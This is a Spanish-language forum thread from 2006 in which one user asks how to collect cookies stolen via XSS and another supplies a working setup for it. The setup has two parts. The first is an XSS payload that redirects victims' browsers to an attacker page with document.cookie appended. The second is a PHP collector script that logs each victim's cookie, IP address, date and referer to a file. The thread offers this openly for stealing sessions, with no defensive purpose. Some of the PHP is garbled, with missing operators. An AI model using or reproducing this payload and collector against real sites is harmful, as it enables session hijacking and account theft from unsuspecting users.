Problemas con reenvío de cookies.. en XSS vulnerable.

Iniciado por Blixx, 5 Agosto 2006, 11:23 AM

0 Miembros y 1 Visitante están viendo este tema.

Blixx

Hola.. en un escenario típico donde una página es vulnerable a rediregir los navegadores, con el código:

<script>window.location=site.com/steal.php?cookie='+document.cookie;</script>


para que luego steal.php grabe la variable cookie.. con el contenido de la cookie en un archivo log.txt digamos.. Pero ahora.. qué sitio permite grabar el texto, con la información obtenida? Es decir, la mayoría de servidores gratuitos no otorgan permiso de escritura en sus archivos..

Habría alguna forma alternativa.. de quizás, enviar el valor de 'cookie' usando steal.php.. pero a algún correo por ejemplo? O usando POST /formulario?=cookie.. Desde dónde podría ver el archivo que registra el steal.php que contiene $cookie = $_GET['cookie'];?

ifcaro

Yo en mi servidor de www.wwwpuntocom.com use este codigo y si m funciono:

guarda la variable ?c= en el archivo steal.php


//cookies.php
<?php
$cookie 
$_GET['c'];
$ip getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp fopen('steal.php''a');
fwrite($fp'
Cookie: '
.$cookie.'   <br>
IP: ' 
.$ip' <br>
Date and Time: ' 
.$date'   <br>
Referer: '
.$referer.' <br><br>');
fclose($fp);
?>


usa el codigo

<script>window.location=site.com/cookies.php?c='+document.cookie;</script>